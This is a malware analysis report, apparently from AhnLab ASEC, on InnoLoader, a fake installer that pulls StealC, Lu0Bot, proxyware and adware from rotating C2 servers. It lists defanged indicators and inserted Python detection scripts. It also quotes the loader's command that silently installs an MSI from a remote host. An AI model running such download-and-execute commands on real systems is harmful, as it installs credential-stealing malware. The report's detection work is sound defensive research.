AhnLab SEcurity intelligence Center (ASEC) has discovered a new type of malware being distributed disguised as cracks and commercial tools. Unlike earlier malware of this kind, which performed its malicious behaviors immediately upon execution, this malware displays an installer UI and performs its malicious behaviors only when the user clicks buttons during the installation process.

It appears that the malware is generated on the fly in response to each download request rather than served as a pre-built file. As a result, every download yields a sample with a different hash value but the same functionality.

The malware downloads and executes files depending on the response from the C2. At the time of distribution, the files installed were the StealC infostealer, Socks5Systemz, which turns the infected system into a commercial proxy resource, and a Clicker disguised as a security-related browser plugin that inflates page views. Installers for the legitimate Opera browser and 360 Security products were also observed.

The C2 string embedded in the sample contained the timestamp of the download request and country information, which supports the conclusion that a new sample is generated and distributed for each download request. Both the C2 URI and the hash of the sample therefore differ from one download to the next.

It was also confirmed that, for an IP address from which the malware had already been downloaded, a legitimate WinRAR installer was served instead for a certain period of time. This appears to be intended to hinder tracking and analysis of the malware.

The malware was built with Inno Setup. Upon execution, it shows the installation screen below, and clicking the “Next” button twice triggers the malicious behaviors. For convenience, it is referred to here as “InnoLoader”.

Figure 4. Malware execution screen

The malicious behaviors run only when the response to the first C2 connection is “ok”. A certain period of time after the sample was downloaded, the C2 instead responds “no”, in which case the installation completes without any malicious behavior. This, too, is interpreted as an attempt to obstruct analysis.

Once the “ok” response is received, the loader connects, in order, to the C2 URLs defined within the file to obtain download URLs. Each C2 reply carries the download URL in its HTTP “Location” header, and the file at that URL is downloaded and executed. The files executed in this way include both legitimate and malicious ones. The sample used for analysis contained a total of 6 C2 URLs.

After the download and execution completes, the loader moves on to the next C2 URL and repeats the process until all defined C2 URLs have been contacted. The files executed by the sample at the time of analysis are as follows.
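The C2 loop described above leaves a recognizable trace in web proxy logs: a run of requests to the same script with the same five query keys, a “spot” value that increases in the loader's execution order, and 302 replies whose Location header names the actual download host. The following Python is an added example, not code from the ASEC post or from the malware. It assumes a proxy log that records, per request, a timestamp, the client IP, the HTTP status, the URL and the Location header of the reply (“-” when absent); the sample log lines are constructed, with URL shapes taken from the IoCs in Table 1 and kept defanged (hxxp, [.]) as in the report.

```python
"""Reconstruct InnoLoader-style C2 chains from web proxy log lines.

Added example (not from the ASEC post). The log format and sample lines
are constructed; the URL shapes follow the C2 and download IoCs in Table 1.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Every C2 URL in Table 1 carries exactly this query-key set. 'spot' counts
# 1..6 in the order the loader contacts the C2s; 'a' is shared by the chain.
C2_PARAMS = {"paw", "spot", "a", "on", "o"}

# Constructed log: "<timestamp> <client> <status> <url> <location-or-'-'>"
SAMPLE_LOG = """\
2024-06-13T10:02:11Z 10.0.0.7 200 hxxp://monkeyagreement[.]fun/coo.php?paw=883174&spot=1&a=2857&on=444&o=1678 -
2024-06-13T10:02:12Z 10.0.0.7 302 hxxp://monkeyagreement[.]fun/coo.php?paw=883174&spot=1&a=2857&on=444&o=1678 hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt
2024-06-13T10:02:19Z 10.0.0.7 302 hxxp://monkeyagreement[.]fun/coo.php?paw=762694&spot=2&a=2857&on=458&o=1688 hxxps://cdn-edge-node[.]com/online_security_mkl.exe
2024-06-13T10:02:40Z 10.0.0.7 302 hxxp://monkeyagreement[.]fun/coo.php?paw=895836&spot=4&a=2857&on=418&o=1660 hxxps://song.oaksfoxes[.]ltd/tid/202.exe
2024-06-13T10:05:01Z 10.0.0.9 200 hxxp://example[.]test/index.php?spot=1&a=1 -
"""


def refang(text):
    """Turn the report's defanged notation back into parseable URLs."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def parse_line(line):
    """Split one constructed log line into (ts, client, status, url, location)."""
    ts, client, status, url, location = line.split(" ", 4)
    return ts, client, int(status), refang(url), None if location == "-" else refang(location)


def is_c2_request(url):
    """True when the URL targets a .php script with the complete InnoLoader key set."""
    parsed = urlparse(url)
    return parsed.path.endswith(".php") and C2_PARAMS.issubset(parse_qs(parsed.query))


def find_innoloader_chains(lines):
    """Group C2 hits per (client, a) and order them by 'spot'.

    Returns {(client, a): [(spot, c2_host, download_host_or_None), ...]}.
    A 302 for a spot overrides an earlier non-redirect hit so that the
    Location host (the real payload server) is the one reported.
    """
    chains = defaultdict(dict)
    for line in lines:
        if not line.strip():
            continue
        _, client, status, url, location = parse_line(line)
        if not is_c2_request(url):
            continue
        parsed = urlparse(url)
        q = parse_qs(parsed.query)
        spot = int(q["spot"][0])
        download_host = urlparse(location).hostname if status == 302 and location else None
        per_chain = chains[(client, q["a"][0])]
        if spot not in per_chain or download_host:
            per_chain[spot] = (parsed.hostname, download_host)
    return {key: [(s,) + by_spot[s] for s in sorted(by_spot)] for key, by_spot in chains.items()}


if __name__ == "__main__":
    for (client, campaign), steps in find_innoloader_chains(SAMPLE_LOG.splitlines()).items():
        print(f"{client} chain a={campaign}:")
        for spot, c2_host, dl_host in steps:
            print(f"  spot {spot}: {c2_host} -> {dl_host or '(no redirect logged)'}")
```

Keying on the full parameter set rather than on the domain alone is deliberate: the report notes that the C2 URI changes per download, so a hostname blocklist ages quickly, while the query shape was constant across all six C2 URLs in the analyzed sample. Gaps in the spot sequence (spot 3 and 5 above) are expected; those entries were the legitimate Opera and 360 Security downloads, which a proxy may log from a different host or not as a redirect at all.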

  • StealC Infostealer
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=883174&spot=1&a=2857&on=444&o=1678
    Download URL: hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt
    0738205d5a1472662b94561e004d9803 (BAT)
  • Malicious browser plugin
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=762694&spot=2&a=2857&on=458&o=1688
    Download URL: hxxps://cdn-edge-node[.]com/online_security_mkl.exe
    ff640a60d25e4bcf1ef290c3d1893a17 (Dropper)
  • Opera browser (normal)
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=401610&spot=3&a=2857&on=420&o=1662
  • Socks5Systemz
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=895836&spot=4&a=2857&on=418&o=1660
    Download URL: hxxps://song.oaksfoxes[.]ltd/tid/202.exe
    1b3ad155c454d3351cfc107344bc4ad5 (Dropper)
    f8bb5272ce5d5b2e767f85e788dd4c5c (Socks5Systemz)
  • 360 Security (normal)
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=956684&spot=5&a=2857&on=460&o=1690
  • Adware disguised as a Windows update tool
    C2 URL: hxxp://monkeyagreement[.]fun/coo.php?paw=787557&spot=6&a=2857&on=244&o=331
    Download URL: hxxp://kapetownlink[.]com/installer.exe
    fa24733f5a6a6f44d0e65d7d98b84aa6 (Dropper)
    95007206c6b2407fb69748ef7c93612 (Adware)

Table 1. Information on files executed by InnoLoader

The StealC infostealer, whose execution chain begins with the BAT file, is the key payload. It steals sensitive user information and sends it to its C2: passwords saved in browsers, login credentials of applications such as cryptocurrency wallets, FTP and mail clients, and information about specific files on the file system. It is an infostealer that is being actively distributed and was also covered in the following post.

  • Warning Against Infostealer Disguised as Installer

The BAT file downloaded and executed by InnoLoader is obfuscated. Upon execution, it downloads and executes a malicious MSI file from the C2 with the following command:

  • Execution command: “msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn”

The MSI file was disguised as a Microsoft Visual C++ installer. When the MSI is executed, it creates a legitimate Node.js executable and an obfuscated malicious script in the TEMP directory, then executes them.

  • 812d99a3d89b8de1b866ac960031e3df (Node.js)
  • 2e85211a7ab36e6d7e2a4a4b5d88b938 (Script)

The malicious script is the Lu0Bot malware. It generates a C2 URL according to a fixed rule, attempts to connect, and can collect information from the infected system and execute commands. Notably, it communicates with its C2 over UDP. During analysis, Lu0Bot was observed downloading and executing StealC: it creates a DLL file and a TXT file under the TEMP directory, and running the DLL with a specific argument ultimately executes StealC.
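The BAT stage above boils down to one process-creation event: msiexec.exe installing a package directly from an http URL with the UI suppressed (“/qn”). That combination is rare in legitimate software deployment and is a cheap, durable detection for this loader chain, independent of the per-download hashes. The following Python is an added example, not code from the ASEC post; it takes process command lines as a Sysmon Event ID 1 or EDR feed would supply them, and the sample command lines are constructed (the first one mirrors the command quoted above, kept defanged). The parsing generalizes beyond the post's single command: it also accepts “/package” and “/a”, the “-” option prefix, and the other UI-suppressing switches msiexec understands.

```python
"""Flag msiexec installing a package straight from http(s) with the UI suppressed.

Added example (not from the ASEC post). Command lines below are constructed;
the first mirrors the command quoted in the post, defanged as in the report.
"""
import re
import shlex
from urllib.parse import urlparse

# msiexec options that take a package path or URL as the next argument.
INSTALL_OPTS = {"i", "package", "a"}
# UI-suppressing options: /q, /qn, /qb, /qr (with optional +, -, ! modifiers), /quiet, /passive.
QUIET_RE = re.compile(r"q[nbr]?[+\-!]*|quiet|passive")

SAMPLE_CMDLINES = [
    # Mirrors the command quoted in the post (kept defanged as in the report).
    "msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn",
    # Legitimate silent install of a local package: quiet, but not remote.
    '"C:\\Windows\\System32\\msiexec.exe" /I "C:\\Users\\user\\Downloads\\vc_redist.msi" /qn',
    # Remote quiet install written with /package and a "-" prefixed option.
    "msiexec.exe /package https://installer.example.test/agent.msi -quiet /norestart",
    # Remote but interactive: still worth a look, lower priority.
    "msiexec /i https://installer.example.test/tool.msi",
    # Not msiexec at all.
    "notepad.exe https://example.test/readme.msi",
]


def refang(text):
    """Turn the report's defanged notation back into a parseable command line."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def analyze_msiexec(cmdline):
    """Return {'package', 'remote', 'quiet'} for an msiexec command line, else None.

    posix=False keeps Windows backslashes intact and keeps quotes on quoted
    tokens, which are stripped afterwards.
    """
    try:
        tokens = shlex.split(refang(cmdline), posix=False)
    except ValueError:  # unbalanced quotes
        return None
    if not tokens:
        return None
    tokens = [t.strip('"') for t in tokens]
    exe = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in ("msiexec", "msiexec.exe"):
        return None
    package, quiet = None, False
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok[:1] in ("/", "-"):
            opt = tok[1:].lower()
            if opt in INSTALL_OPTS and i + 1 < len(tokens):
                package = tokens[i + 1]
                i += 1
            elif QUIET_RE.fullmatch(opt):
                quiet = True
        i += 1
    scheme = urlparse(package).scheme.lower() if package else ""
    return {"package": package, "remote": scheme in ("http", "https"), "quiet": quiet}


def find_remote_msi_installs(cmdlines):
    """Return the analysis of every msiexec command that installs from http(s)."""
    hits = []
    for cmd in cmdlines:
        result = analyze_msiexec(cmd)
        if result and result["remote"]:
            hits.append(dict(result, cmdline=cmd))
    return hits


if __name__ == "__main__":
    for hit in find_remote_msi_installs(SAMPLE_CMDLINES):
        flag = "quiet" if hit["quiet"] else "interactive"
        print(f"[{flag}] remote MSI: {hit['package']}\n    {hit['cmdline']}")
```

In a real deployment, pair this with the parent process: here the parent of msiexec.exe is cmd.exe running a BAT from a user-writable directory, which separates the loader chain from the handful of management tools that legitimately pass an http URL to msiexec.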

Caution is advised: for persistence, Lu0Bot, which installs StealC, copies itself under the ProgramData directory and creates a shortcut in the Startup folder. While this malware is running, the threat actor can install additional malware at any time.

The malware is executed through a deliberately convoluted chain that makes analysis and tracking difficult, and it is currently being actively distributed. Because it acts on responses from the C2, the threat actor can install any other malware at any time, and they use various methods to hinder analysis and detection. Download software only from official distribution sites, refrain from using illegal tools such as cracks, and never execute files downloaded from untrusted pages.

AhnLab detects and blocks the malware mentioned in the report under the aliases below.

File detection:
  • Infostealer/Win.InnoLoader.R653716 (2024.06.13.02)
  • Infostealer/Win.Stealc.R654152 (2024.06.19.00)
  • Trojan/MSI.Stealc
  • Trojan/BAT.Loader

MD5:
  • 0283c9517cfb46faec1735262bd58654
  • 0738205d5a1472662b94561e004d9803
  • 246e4469c1715c323a3fedecb146d4f0
  • 2e85211a7ab36e6d7e2a4a4b5d88b938
  • 36976499c3edd13f5dc6c7da9b1aca6b